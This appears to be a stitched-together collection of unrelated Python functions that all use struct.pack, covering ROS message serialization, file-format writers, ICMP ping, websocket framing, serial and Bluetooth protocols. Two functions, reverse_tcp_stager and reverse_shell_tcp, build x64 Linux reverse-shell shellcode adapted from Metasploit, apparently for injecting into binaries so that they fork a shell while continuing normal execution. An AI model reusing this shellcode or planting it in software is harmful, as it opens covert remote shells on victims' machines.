def serialize(self, buff): """ serialize message into buffer :param buff: buffer, ``StringIO`` """ try: _x = self.agent_one length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode("utf-8") length = len(_x) buff.write(struct.pack("<I%ss" % length, length, _x)) _x = self.agent_two length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode("utf-8") length = len(_x) buff.write(struct.pack("<I%ss" % length, length, _x)) _x = self buff.write( _struct_6d.pack(_x.rotationx, _x.rotationy, _x.angle, _x.referencex, _x.referencey, _x.evaluation) ) except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x)))) except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def readBlock(self,adr,length,filename): print('Read block') f = file(filename, 'wb') pkt = struct.pack('>I',adr) command = struct.pack('B',self.MTK_COMMAND_READ16) self._port.write(command) if self._port.read(1) != command: raise Exception('Invalid resonse command') self._port.write(pkt) if self._port.read(4) != pkt: raise Exception('Invalid resonse address') pkt = struct.pack('>I', length) self._port.write(pkt) if self._port.read(4) != pkt: raise Exception('Invalid resonse length') var = self._port.read(length*2) out = ''.join([c for t in zip(var[1::2], var[::2]) for c in t]) f.write(out) f.close()
def __init__(self, is_binary, file_name): self.magic = struct.pack('3s', "SFP") self.file_type = struct.pack('b', is_binary) self.sfile_name = file_name self.data = '' self.sfilesize = 0 self.random_data()
def __init__(self, fp, bits, width, height): self.fp = fp self.bits = bits self.width = width self.height = height if bits == 1: ncols = 2 elif bits == 8: ncols = 256 elif bits == 24: ncols = 0 else: raise ValueError(bits) self.linesize = align32((self.width*self.bits+7)/8) self.datasize = self.linesize * self.height info = struct.pack('<IiiHHIIIIII', 40, self.width, self.height, 1, self.bits, 0, self.datasize, 0, 0, 0, 0) assert len(info) == 40, len(info) header = struct.pack('<ccIHHI', 'B', 'M', 14+40+self.datasize, 0, 0, 14+40) assert len(header) == 14, len(header) self.fp.write(header) self.fp.write(info) if ncols == 2: self.fp.write('\x00\x00\x00\xff\xff\xff') elif ncols == 256: for i in xrange(256): self.fp.write(struct.pack('bbb', i,i,i)) self.pos0 = self.fp.tell() self.pos1 = self.pos0 + self.datasize return
def proc_gentlink(self): #get GELINK Header info cmd='TASKSTATS\0' mlen=len(cmd) + 4 msg_ts=array.array(str('B')) msg_ts.fromstring(struct.pack("BBxx", CTRL_CMD_GETFAMILY, 0)) msg_ts.fromstring(struct.pack("HH", mlen, CTRL_ATTR_FAMILY_NAME)) msg_ts.fromstring(cmd) tmp=((4 - (len(msg_ts) % 4)) & 0x3) msg_ts.fromstring('\0' * ((4 - (len(cmd) % 4)) & 0x3)) nlmhdr_msg=array.array(str('B'),struct.pack(str('=IHHII'), len(msg_ts) + 16, NETLINK_GENERIC, NLM_F_REQUEST, 0, 0)) nlmhdr_msg.extend(msg_ts) self.socket.send(nlmhdr_msg) data = self.socket.recv(65536)#(16384) data=self.unpack_nlhdr(data) data=self.unpack_genlhdr(data) while len(data) > 0: data=self.unpack_attr_hdr(data) # if self.flags & 0x2 == 0: if debug>0: print "End of receiving message!" return
def ConvertXmlToTHCsv(xmlfile): tree = ET.parse(xmlfile) THCsv = tree.getroot() if THCsv.tag != 'THCsv': return blockcount = len(THCsv) rows = [] for row in THCsv: textlist = [] for text in row: textlist.append(text.find('sc').text) rows.append(textlist) csv = open(os.path.splitext(xmlfile)[0], 'wb') csv.write(struct.pack('<I', len(rows))) for row in rows: csv.write(struct.pack('<I', len(row))) for text in row: text = text.encode('936') csv.write(struct.pack('<I', len(text))) csv.write(text)
def serialize(self): r = "" r += struct.pack("<i", self.nVersion) r += ser_vector(self.vin) r += ser_vector(self.vout) r += struct.pack("<I", self.nLockTime) return r
def reverse_tcp_stager(self, flItms, CavesPicked={}): """ FOR USE WITH STAGER TCP PAYLOADS INCLUDING METERPRETER Modified from metasploit payload/linux/x64/shell/reverse_tcp to correctly fork the shellcode payload and continue normal execution. """ if self.PORT is None: print ("Must provide port") return False #64bit shellcode self.shellcode1 = "\x6a\x39\x58\x0f\x05\x48\x85\xc0\x74\x0c" self.shellcode1 += "\x48\xBD" self.shellcode1 += struct.pack("<Q", self.e_entry) self.shellcode1 += "\xff\xe5" self.shellcode1 += ("\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9" "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x56\x50\x6a\x29\x58\x99\x6a" "\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48\xb9\x02\x00") self.shellcode1 += struct.pack("!H", self.PORT) self.shellcode1 += self.pack_ip_addresses() self.shellcode1 += ("\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f" "\x05\x59\x5e\x5a\x0f\x05\xff\xe6") self.shellcode = self.shellcode1 return (self.shellcode1)
def serialize(self, buff): """ serialize message into buffer :param buff: buffer, ``StringIO`` """ try: _x = self buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs)) _x = self.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_struct_4i.pack(_x.count, _x.nch, _x.length, _x.data_bytes)) length = len(self.src) buff.write(_struct_I.pack(length)) for val1 in self.src: length = len(val1.wavedata) buff.write(_struct_I.pack(length)) pattern = '<%sf'%length buff.write(struct.pack(pattern, *val1.wavedata)) except struct.error as se: self._check_types(se) except TypeError as te: self._check_types(te)
def mix_files(a, b, c, chann = 2, phase = -1.): f1 = wave.open(a,'r') f2 = wave.open(b,'r') f3 = wave.open(c,'w') f3.setnchannels(chann) f3.setsampwidth(2) f3.setframerate(44100) f3.setcomptype('NONE','Not Compressed') frames = min(f1.getnframes(), f2.getnframes()) print "Mixing files, total length %.2f s..." % (frames / 44100.) d1 = f1.readframes(frames) d2 = f2.readframes(frames) for n in range(frames): if not n%(5*44100): print n // 44100, 's' if chann < 2: d3 = struct.pack('h', .5 * (struct.unpack('h', d1[2*n:2*n+2])[0] + struct.unpack('h', d2[2*n:2*n+2])[0])) else: d3 = ( struct.pack('h', phase * .3 * struct.unpack('h', d1[2*n:2*n+2])[0] + .7 * struct.unpack('h', d2[2*n:2*n+2])[0]) + struct.pack('h', .7 * struct.unpack('h', d1[2*n:2*n+2])[0] + phase * .3 * struct.unpack('h', d2[2*n:2*n+2])[0]) ) f3.writeframesraw(d3) f3.close()
def write_mmio_reg( self, phys_address, size, value ): if size == 8: buf = struct.pack( '=Q', value ) elif size == 4: buf = struct.pack( '=I', value&0xFFFFFFFF ) elif size == 2: buf = struct.pack( '=H', value&0xFFFF ) elif size == 1: buf = struct.pack( '=B', value&0xFF ) else: return False return self.write_phys_mem( ((phys_address>>32)&0xFFFFFFFF), (phys_address&0xFFFFFFFF), size, buf )
def reverse_shell_tcp(self, flItms, CavesPicked={}): """ Modified from metasploit payload/linux/x64/shell_reverse_tcp to correctly fork the shellcode payload and continue normal execution. """ if self.PORT is None: print ("Must provide port") return False #64bit shellcode self.shellcode1 = "\x6a\x39\x58\x0f\x05\x48\x85\xc0\x74\x0c" self.shellcode1 += "\x48\xBD" self.shellcode1 += struct.pack("<Q", self.e_entry) self.shellcode1 += "\xff\xe5" self.shellcode1 += ("\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05" "\x48\x97\x48\xb9\x02\x00") self.shellcode1 += struct.pack("!H", self.PORT) self.shellcode1 += self.pack_ip_addresses() self.shellcode1 += ("\x51\x48\x89" "\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce" "\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62" "\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6" "\x0f\x05") self.shellcode = self.shellcode1 return (self.shellcode1)
def get_lockdata(): if sys.platform.startswith('atheos'): start_len = "qq" else: try: os.O_LARGEFILE except AttributeError: start_len = "ll" else: start_len = "qq" if (sys.platform.startswith(('netbsd', 'freebsd', 'openbsd', 'bsdos')) or sys.platform == 'darwin'): if struct.calcsize('l') == 8: off_t = 'l' pid_t = 'i' else: off_t = 'lxxxx' pid_t = 'l' lockdata = struct.pack(off_t + off_t + pid_t + 'hh', 0, 0, 0, fcntl.F_WRLCK, 0) elif sys.platform in ['aix3', 'aix4', 'hp-uxB', 'unixware7']: lockdata = struct.pack('hhlllii', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0) elif sys.platform in ['os2emx']: lockdata = None else: lockdata = struct.pack('hh'+start_len+'hh', fcntl.F_WRLCK, 0, 0, 0, 0, 0) if lockdata: if verbose: print 'struct.pack: ', repr(lockdata) return lockdata
def update_sha(sha, f): if f: sha.update(f.read()) f.seek(0) sha.update(pack('I', filesize(f))) else: sha.update(pack('I', 0))
def serialize_numpy(self, buff, numpy): """ serialize message with numpy array types into buffer :param buff: buffer, ``StringIO`` :param numpy: numpy python module """ try: _x = self buff.write(_struct_if.pack(_x.a, _x.b)) _x = self.c length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) if python3: buff.write(struct.pack('<I%sB'%length, length, *_x)) else: buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(self.d.tostring()) length = len(self.e) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.e.tostring()) except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x)))) except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def tsigverify(pkt, keys, vertime = None): if vertime is None: vertime = int(time.time()) if len(pkt.adlist) < 1: return proto.FORMERR sr = pkt.adlist[-1] pkt.adlist = pkt.adlist[:-1] if not sr.head.istype("TSIG") or sr.head.rclass != rec.CLASSANY: return proto.FORMERR for key in keys: if key.name == sr.head.name: break else: return proto.BADKEY if key.algo.cname != sr.data["algo"]: return proto.BADKEY pkt.tsigctx = ctx = tsigctx(key, pkt, sr) other = sr.data["other"] msg = pkt.encode() msg += key.name.canonwire() msg += struct.pack(">HL", rec.CLASSANY, 0) msg += key.algo.cname.canonwire() msg += struct.pack(">Q", sr.data["stime"])[-6:] msg += struct.pack(">3H", sr.data["fudge"], sr.data["err"], len(other)) msg += other digest = key.sign(msg) if digest != sr.data["mac"]: pkt.tsigctx = proto.BADSIG return proto.BADSIG if vertime != 0: if abs(vertime - sr.data["stime"]) > sr.data["fudge"]: pkt.tsigctx = proto.BADTIME return proto.BADTIME return key
def writeData(self,f): self.offset=f.tell(); print("BindShape "+str(len(self.bindShape))); for b in self.bindShape: f.write(struct.pack("<f",b)); f.write(struct.pack("<I",len(self.joints)));#joints for j in self.joints: f.write(struct.pack("<I",len(j.reference)+1));#mesh f.write(bytearray('#',"ascii")); f.write(bytearray(j.reference,"ascii")); f.write(struct.pack("<I",len(self.joints)*16));#joints for b in self.jointBindPoses: f.write(struct.pack("<f",b)); #Omit bounding box #f.write(struct.pack("<f",0));#Omit bounding box #f.write(struct.pack("<f",0));#Omit bounding box #f.write(struct.pack("<f",0));#Omit bounding box #f.write(struct.pack("<f",0));#Omit bounding box #f.write(struct.pack("<f",0));#Omit bounding box #f.write(struct.pack("<f",0));#Omit bounding box #Omit bounding sphere #f.write(struct.pack("<f",0));#Omit bounding sphere #f.write(struct.pack("<f",0));#Omit bounding sphere #f.write(struct.pack("<f",0));#Omit bounding sphere #f.write(struct.pack("<f",0));#Omit bounding sphere return ;
def encode_hybi(buf, opcode, base64=False): """ Encode a HyBi style WebSocket frame. Optional opcode: 0x0 - continuation 0x1 - text frame (base64 encode buf) 0x2 - binary frame (use raw buf) 0x8 - connection close 0x9 - ping 0xA - pong """ if base64: buf = b64encode(buf) b1 = 0x80 | (opcode & 0x0f) # FIN + opcode payload_len = len(buf) if payload_len <= 125: header = pack('>BB', b1, payload_len) elif payload_len > 125 and payload_len < 65536: header = pack('>BBH', b1, 126, payload_len) elif payload_len >= 65536: header = pack('>BBQ', b1, 127, payload_len) #self.msg("Encoded: %s", repr(header + buf)) return header + buf, len(header), 0
def serialize_numpy(self, buff, numpy): """ serialize message with numpy array types into buffer :param buff: buffer, ``StringIO`` :param numpy: numpy python module """ try: _x = self buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs)) _x = self.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_struct_2I.pack(_x.status.goal_id.stamp.secs, _x.status.goal_id.stamp.nsecs)) _x = self.status.goal_id.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_struct_B.pack(self.status.status)) _x = self.status.text length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_struct_f.pack(self.feedback.percent_complete)) except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x)))) except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def test_wrap_round_robin(self): cluster = Mock(spec=Cluster) cluster.metadata = Mock(spec=Metadata) hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)] for host in hosts: host.set_up() def get_replicas(keyspace, packed_key): index = struct.unpack('>i', packed_key)[0] return list(islice(cycle(hosts), index, index + 2)) cluster.metadata.get_replicas.side_effect = get_replicas policy = TokenAwarePolicy(RoundRobinPolicy()) policy.populate(cluster, hosts) for i in range(4): query = Statement(routing_key=struct.pack('>i', i), keyspace='keyspace_name') qplan = list(policy.make_query_plan(None, query)) replicas = get_replicas(None, struct.pack('>i', i)) other = set(h for h in hosts if h not in replicas) self.assertEqual(replicas, qplan[:2]) self.assertEqual(other, set(qplan[2:])) # Should use the secondary policy for i in range(4): qplan = list(policy.make_query_plan()) self.assertEqual(set(qplan), set(hosts))
def getRSSI(self): """Detects whether the device is near by or not""" addr = self.address # Open hci socket hci_sock = bt.hci_open_dev() hci_fd = hci_sock.fileno() # Connect to device (to whatever you like) bt_sock = bluetooth.BluetoothSocket(bluetooth.L2CAP) bt_sock.settimeout(10) result = bt_sock.connect_ex((addr, 1)) # PSM 1 - Service Discovery try: # Get ConnInfo reqstr = struct.pack("6sB17s", bt.str2ba(addr), bt.ACL_LINK, "\0" * 17) request = array.array("c", reqstr ) handle = fcntl.ioctl(hci_fd, bt.HCIGETCONNINFO, request, 1) handle = struct.unpack("8xH14x", request.tostring())[0] # Get RSSI cmd_pkt=struct.pack('H', handle) rssi = bt.hci_send_req(hci_sock, bt.OGF_STATUS_PARAM, bt.OCF_READ_RSSI, bt.EVT_CMD_COMPLETE, 4, cmd_pkt) rssi = struct.unpack('b', rssi[3])[0] # Close sockets bt_sock.close() hci_sock.close() return rssi except Exception, e: return None
def send_one_ping(my_socket, dest_addr, ID): """ Send one ping to the given >dest_addr<. """ dest_addr = socket.gethostbyname(dest_addr) # Header is type (8), code (8), checksum (16), id (16), sequence (16) my_checksum = 0 # Make a dummy heder with a 0 checksum. header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, my_checksum, ID, 1) bytesInDouble = struct.calcsize("d") data = (192 - bytesInDouble) * "Q" data = struct.pack("d", time.time()) + data # Calculate the checksum on the data and the dummy header. my_checksum = checksum(header + data) # Now that we have the right checksum, we put that in. It's just easier # to make up a new header than to stuff it into the dummy. header = struct.pack( "bbHHh", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), ID, 1 ) packet = header + data my_socket.sendto(packet, (dest_addr, 1)) # Don't know about the 1
def sendCMDreceiveATT(self, data_length, code, data): checksum = 0 total_data = ['$', 'M', '<', data_length, code] + data for i in struct.pack('<2B%dh' % len(data), *total_data[3:len(total_data)]): checksum = checksum ^ ord(i) total_data.append(checksum) try: start = time.time() b = None b = self.ser.write(struct.pack('<3c2B%dhB' % len(data), *total_data)) while True: header = self.ser.read() if header == '$': header = header+self.ser.read(2) break datalength = struct.unpack('<b', self.ser.read())[0] code = struct.unpack('<b', self.ser.read()) data = self.ser.read(datalength) temp = struct.unpack('<'+'h'*(datalength/2),data) self.ser.flushInput() self.ser.flushOutput() elapsed = time.time() - start self.attitude['angx']=float(temp[0]/10.0) self.attitude['angy']=float(temp[1]/10.0) self.attitude['heading']=float(temp[2]) self.attitude['elapsed']=round(elapsed,3) self.attitude['timestamp']="%0.2f" % (time.time(),) return self.attitude except Exception, error: #print "\n\nError in sendCMDreceiveATT." #print "("+str(error)+")\n\n" pass
def writev5_1conflicteddata(conflictedentries, reucdata, dirdata): global writtenbytes for d in sorted(conflictedentries): for f in d: if d["pathname"] == "": filename = d["filename"] else: filename = d["pathname"] + "/" + d["filename"] dirdata[filename]["cr"] = fw.tell() try: dirdata[filename]["ncr"] += 1 except KeyError: dirdata[filename]["ncr"] = 1 fwrite(d["pathname"] + d["filename"]) fwrite("\0") stages = set() fwrite(struct.pack("!b", 0)) for i in xrange(0, 2): fwrite(struct.pack("!i", d["mode"])) if d["mode"] != 0: stages.add(i) for i in sorted(stages): print i fwrite(binascii.unhexlify(d["sha1"])) writecrc32() for f in reucdata[d]: print f return dirdata
def serialize(self): r = "" r += struct.pack("<Q", self.nServices) r += self.pchReserved r += socket.inet_aton(self.ip) r += struct.pack(">H", self.port) return r
def serialize_numpy(self, buff, numpy): """ serialize message with numpy array types into buffer :param buff: buffer, ``StringIO`` :param numpy: numpy python module """ try: _x = self buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs)) _x = self.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_struct_2I.pack(_x.status.goal_id.stamp.secs, _x.status.goal_id.stamp.nsecs)) _x = self.status.goal_id.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_struct_B.pack(self.status.status)) _x = self.status.text length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_struct_3f.pack(_x.feedback.forward_dist_x, _x.feedback.forward_dist_y, _x.feedback.rotation_dist)) except struct.error as se: self._check_types(se) except TypeError as te: self._check_types(te)
def writev5_0directories(paths, treeextensiondata): offsets = dict() subtreenr = dict() # Calculate subtree numbers for p in sorted(paths, reverse=True): splited = p.split("/") if p not in subtreenr: subtreenr[p] = 0 if len(splited) > 1: i = 0 path = "" while i < len(splited) - 1: path += "/" + splited[i] i += 1 if path[1:] not in subtreenr: subtreenr[path[1:]] = 1 else: subtreenr[path[1:]] += 1 for p in paths: offsets[p] = writtenbytes fwrite(struct.pack("!Q", 0)) fwrite(p.split("/")[-1] + "\0") p += "/" if p in treeextensiondata: fwrite(struct.pack("!ll", int(treeextensiondata[p]["entry_count"]), int(treeextensiondata[p]["subtrees"]))) if (treeextensiondata[p]["entry_count"] != "-1"): fwrite(binascii.unhexlify(treeextensiondata[p]["sha1"])) else: # If there is no cache-tree data we assume the entry is invalid fwrite(struct.pack("!ii", -1, subtreenr[p.strip("/")])) return offsets
def _write_key_sect(self, outfile): # Writes the key section header, key block index, and all the key blocks to # outfile. # outfile: a file-like object, opened in binary mode. keyblocks_total_size = sum(len(b.get_block()) for b in self._key_blocks) if self._version == "2.0": preamble = struct.pack(b">QQQQQ", len(self._key_blocks), self._num_entries, self._keyb_index_decomp_size, self._keyb_index_comp_size, keyblocks_total_size) preamble_checksum = struct.pack(b">L", zlib.adler32(preamble)) if(self._encrypt): preamble = _salsa_encrypt(preamble, self._encrypt_key) outfile.write(preamble) outfile.write(preamble_checksum) else: preamble = struct.pack(b">LLLL", len(self._key_blocks), self._num_entries, self._keyb_index_decomp_size, keyblocks_total_size) if(self._encrypt): preamble = _salsa_encrypt(preamble, self._encrypt_key) outfile.write(preamble) outfile.write(self._keyb_index) for b in self._key_blocks: outfile.write(b.get_block())
def save(self, path, items): # TODO: purge old cache with atomic_file(path) as f: c = 0 f.write(struct.pack("I", c)) # check is marshalable and compatible with broadcast can_marshal = marshalable(items) for v in items: if can_marshal: try: r = 0, marshal.dumps(v) except Exception: r = 1, cPickle.dumps(v, -1) can_marshal = False else: r = 1, cPickle.dumps(v, -1) f.write(msgpack.packb(r)) c += 1 yield v bytes = f.tell() if bytes > 10 << 20: logger.warning("cached result is %dMB (larger than 10MB)", bytes >> 20) # count f.seek(0) f.write(struct.pack("I", c))
def spi_transfer(data): if len(data) > 1024: data = data[:1024] temp = struct.pack(">BH", OPCODE_SPI_TXFR, len(data)) + data crc = crc16_buff(temp) tx_data = struct.pack(">H", sync) + temp + struct.pack(">H", crc) # print "Data in TX Buffer:" + ':'.join(x.encode('hex') for x in tx_data) if ser.inWaiting() > 0: rx_data = ser.read(ser.inWaiting()) print "Data in RX Buffer:" + ":".join(x.encode("hex") for x in rx_data) ser.write(tx_data) time.sleep(1) print str(ser.inWaiting()) + " waiting." rx_data = ser.read(len(tx_data)) print "SPI RX Data:" + ":".join(x.encode("hex") for x in rx_data) print rx_data calc_crc = crc16_buff(rx_data[2:-2]) if struct.pack(">H", calc_crc) == rx_data[-2:]: print "Checksum Match" else: print "Checksum Fail" if ord(rx_data[2]) == OPCODE_SPI_TXFR: return rx_data[5:-2] else: print "No Opcode Found!" return rx_data
def encode_vector3(value): return struct.pack("3f", *(value.x, value.y, value.z))
def read_record(f): record = Record.from_buffer(bytearray(f.read(sizeof(Record)))) content = f.read(record.size) return struct.pack('<I', record.magic), record.size, content
def char(c): return struct.pack("=c", c.encode('ascii'))
def __init__(self, host, connect_timeout, write_timeout=None, read_timeout=None): self.connected = True msg = None port = AMQP_PORT m = IPV6_LITERAL.match(host) if m: host = m.group(1) if m.group(2): port = int(m.group(2)) else: if ':' in host: host, port = host.rsplit(':', 1) port = int(port) self.sock = None last_err = None for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM, SOL_TCP): af, socktype, proto, canonname, sa = res try: self.sock = socket.socket(af, socktype, proto) try: set_cloexec(self.sock, True) except NotImplementedError: pass self.sock.settimeout(connect_timeout) self.sock.connect(sa) except socket.error as exc: msg = exc self.sock.close() self.sock = None last_err = msg continue break if not self.sock: # Didn't connect, return the most recent error message raise socket.error(last_err) try: self.sock.settimeout(None) # set socket back to blocking mode self.sock.setsockopt(SOL_TCP, socket.TCP_NODELAY, 1) self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) # set socket timeouts for (timeout, interval) in ((socket.SO_SNDTIMEO, write_timeout), (socket.SO_RCVTIMEO, read_timeout)): if interval is not None: self.sock.setsockopt(socket.SOL_SOCKET, timeout, struct.pack('ll', interval, 0)) self._setup_transport() self._write(AMQP_PROTOCOL_HEADER) except (OSError, IOError, socket.error) as exc: if get_errno(exc) not in _UNAVAIL: self.connected = False raise
def main_loop(gworld): print('-- actors --') for p in ph.GetActorsNames(gworld): print(p) print('-- textures --') drone_textures=[] for tn in drone_texture_names: drone_textures.append(ph.GetTextureByName(tn)) drone_textures_down=[] for tn in drone_textures_down_names: drone_textures_down.append(ph.GetTextureByName(tn)) drone_textures_depth=[] for tn in drone_textures_depth_names: drone_textures_depth.append(ph.GetTextureByName(tn)) if not all(drone_textures): print("Error, Could not find all textures") while 1: yield drone_actors=[] for drn in drone_actors_names: drone_actors.append(ph.FindActorByName(gworld,drn)) if not all(drone_actors): print("Error, Could not find all drone actors") while 1: yield for _ in range(10): #need to send it a few time don't know why. print('sending state main loop') socket_pub.send_multipart([config.topic_unreal_state,b'main_loop']) yield drone_start_positions=[np.array(ph.GetActorLocation(drone_actor)) for drone_actor in drone_actors] positions=[None for _ in range(config.n_drones)] while 1: for drone_index in range(config.n_drones): socket_sub=drone_subs[drone_index] drone_actor=drone_actors[drone_index] while len(zmq.select([socket_sub],[],[],0)[0])>0: topic, msg = socket_sub.recv_multipart() positions[drone_index]=pickle.loads(msg) #print('-----',positions[drone_index]) position=positions[drone_index] if position is not None: new_pos=drone_start_positions[drone_index]+np.array([position['posx'],position['posy'],position['posz']])*100 #turn to cm ph.SetActorLocation(drone_actor,new_pos) ph.SetActorRotation(drone_actor,(position['roll'],position['pitch'],position['yaw'])) positions[drone_index]=None yield for drone_index in range(config.n_drones): #img=cv2.resize(ph.GetTextureData(drone_textures[drone_index]),(1024,1024),cv2.INTER_LINEAR) topics=[] imgs=[] img=ph.GetTextureData(drone_textures[drone_index]) topics.append(config.topic_unreal_drone_rgb_camera%drone_index) imgs.append(img) if drone_index<len(drone_textures_down): img_down=ph.GetTextureData(drone_textures_down[drone_index]) topics.append(config.topic_unreal_drone_rgb_camera%drone_index+b'down') imgs.append(img_down) if drone_index<len(drone_textures_depth): img_depth=ph.GetTextureData16f(drone_textures_depth[drone_index],channels=[0,1,2,3]) #depth data will be in A componnent #img_depth=ph.GetTextureData(drone_textures_depth[drone_index],channels=[2]) #depth data will be in red componnent topics.append(config.topic_unreal_drone_rgb_camera%drone_index+b'depth') imgs.append(img_depth) #topics=[config.topic_unreal_drone_rgb_camera%drone_index, # config.topic_unreal_drone_rgb_camera%drone_index+b'down', # config.topic_unreal_drone_rgb_camera%drone_index+b'depth'] #imgs=[ ph.GetTextureData(drone_textures[drone_index]), # ph.GetTextureData(drone_textures_down[drone_index]), # ph.GetTextureData(drone_textures_depth[drone_index],channels=[2])] if pub_cv: for topic,img in zip(topics,imgs): #socket_pub.send_multipart([topic,pickle.dumps(img,2)]) #print('--->',img.shape) socket_pub.send_multipart([topic,struct.pack('lll',*img.shape),img.tostring()]) #socket_pub.send_multipart([topic,pickle.dumps(img,-1)]) if show_cv: cv2.imshow('drone camera %d'%drone_index,img) cv2.waitKey(1)
def bulkRead(self, endpoint, length, timeout=0): dat = struct.pack("HH", endpoint, 0) return self.transact(dat)
def bulkWrite(self, endpoint, data, timeout=0): if len(data) > 0x10: raise ValueError("Data must not be longer than 0x10") dat = struct.pack("HH", endpoint, len(data)) + data return self.transact(dat)
def controlRead(self, request_type, request, value, index, length, timeout=0): dat = struct.pack("HHBBHHH", 0, 0, request_type, request, value, index, length) return self.transact(dat)
def dd(v): return pack("<I", v)
def discoverGateway(verbose): bcast = "255.255.255.255" port = 1444 wantchk = 2 addressfamily = socket.AF_INET data = struct.pack('<bbbbbbbb', 1,0,0,0, 0,0,0,0) # Create a UDP socket try: udpSock = socket.socket(addressfamily, socket.SOCK_DGRAM) except: sys.stderr.write("ERROR: {}: socket.socket boarked.\n".format(me)) sys.exit(1) # Get ready to broadcast try: udpSock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) except: sys.stderr.write("ERROR: {}: udpSock.setsockopt boarked.\n".format(me)) sys.exit(2) # send the datagram if(verbose): print("Broadcasting for pentair systems...") try: udpSock.sendto(data, (bcast, port)) except: sys.stderr.write("ERROR: {}: udpSock.sendto boarked.\n".format(me)) sys.exit(3) # listen for a gateway responding if(verbose): print("Waiting for a response...") try: data, server = udpSock.recvfrom(4096) except: sys.stderr.write("ERROR: {}: udpSock.recvfrom boarked.\n".format(me)) sys.exit(4) try: udpSock.close() except: # not sure we really need to exit if we can't close the socket... sys.stderr.write("ERROR: {}: udpSock.close boarked.\n".format(me)) sys.exit(5) # "server" is ip_address:port that we got a response from. # not sure what happens if we have to gateways on a subnet. havoc i suppose. if(verbose): addr, port = server print("INFO: {}: Received a response from {}:{}".format(me(), addr, port)) # the format here is a little different than the documentation. # the response I get back includes the gateway's name in the form of "Pentair: AB-CD-EF" expectedfmt = "<I4BH2B" paddedfmt = expectedfmt + str(len(data)-struct.calcsize(expectedfmt)) + "s" try: chk, ip1, ip2, ip3, ip4, gatewayPort, gatewayType, gatewaySubtype, gatewayName = struct.unpack(paddedfmt, data) except struct.error as err: print("ERROR: {}: received unpackable data from the gateway: \"{}\"".format(me, err)) sys.exit(6) okchk = (chk == wantchk) if(not okchk): # not sure that I need to exit if "chk" isn't what we wanted. sys.stderr.write("ERROR: {}: Incorrect checksum. Wanted '{}', got '{}'\n".format(me, wantchk, chk)) #sys.exit(7) # make sure we got a good IP address receivedIP = "{}.{}.{}.{}".format(str(ip1), str(ip2), str(ip3), str(ip4)) try: gatewayIP = str(ipaddress.ip_address(receivedIP)) except ValueError as err: print("ERROR: {}: got an invalid IP address from the gateway:\n \"{}\"".format(me, err)) sys.exit(8) except NameError as err: print("ERROR: {}: received garbage from the gateway:\n \"{}\"".format(me, err)) sys.exit(9) except: print("ERROR: {}: Couldn't get an IP address for the gateway.".format(me, err)) sys.exit(10) if(verbose): print("gatewayIP: '{}'".format(gatewayIP)) print("gatewayPort: '{}'".format(gatewayPort)) print("gatewayType: '{}'".format(gatewayType)) print("gatewaySubtype: '{}'".format(gatewaySubtype)) print("gatewayName: '{}'".format(gatewayName.decode("utf-8").strip('\0'))) return gatewayIP, gatewayPort, gatewayType, gatewaySubtype, gatewayName.decode("utf-8").strip('\0'), okchk
def db(v): return pack("<B", v)
def dw(v): return pack("<H", v)
